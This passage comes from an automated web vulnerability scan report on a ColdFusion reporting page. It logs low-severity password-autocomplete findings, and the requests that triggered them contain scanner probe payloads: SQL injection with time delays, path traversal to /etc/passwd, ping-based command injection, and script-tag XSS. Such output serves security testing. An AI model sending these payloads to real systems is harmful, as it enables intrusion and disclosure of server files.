Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=1%27+%7c%7c+(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)+%7c%7c+%27 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:07 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:07 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1%27+%7c%7c+(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)+%7c%7c+%27" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.265. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=../../../../../../../../../../windows/iis6.log HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../windows/iis6.log" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.266. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL))) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:51 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:51 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.267. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=SELECT%20pg_sleep(25)-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e3042a9b6d0213f1e43
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:09 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:09 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=SELECT%20pg_sleep(25)--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.268. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%22%2Bprint(int)0xFFF9999-22;// HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:45 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%22%2Bprint(int)0xFFF9999-22;//" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.269. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/index.cfm?nsextt=%3Cscript%3Ens(0x000024)%3C/script%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:45 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:46 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:46 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt=%3cscript%3ens(0x000024)%3c/script%3e" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...
18.270. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=NSFTW HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:04 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:04 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=NSFTW" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.271. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register='%3E%3Cnet%20sparker=netsparker(0x00002F)%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30f0eb525229456582
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:47 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:47 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='%3E%3Cnet%20sparker=netsparker(0x00002F)%3E" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.272. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%3c%25+response.write(268409241-22)+%25%3e HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%3c%25+response.write(268409241-22)+%25%3e" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.273. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%22%26ping%20-c%2026%20127.0.0.1%20%26%22 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%22%26ping%20-c%2026%20127.0.0.1%20%26%22" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.274. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register='%2BNSFTW%2B' HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:04 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:04 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='%2BNSFTW%2B'" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.275. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=1+OR+X%3d'ss HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1+OR+X%3d'ss" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.276. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register='AND%201=(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))%2B' HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='AND%201=(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))%2B'" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.277. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%2Bresponse.write(268409241-22)%27 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:39 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%2Bresponse.write(268409241-22)%27" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.278. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=ping%20-c%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=ping%20-c%2026%20127.0.0.1%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.279. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000006)%3C/script%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:37 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:37 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000006)%3C/script%3E" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.280. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=../../../../../../../../../../../etc/passwd%00index.cfm HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:52 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:52 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../../etc/passwd%00index.cfm" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.281. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=-111%20OR%20SLEEP(25)=0%20LIMIT%201--+ HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
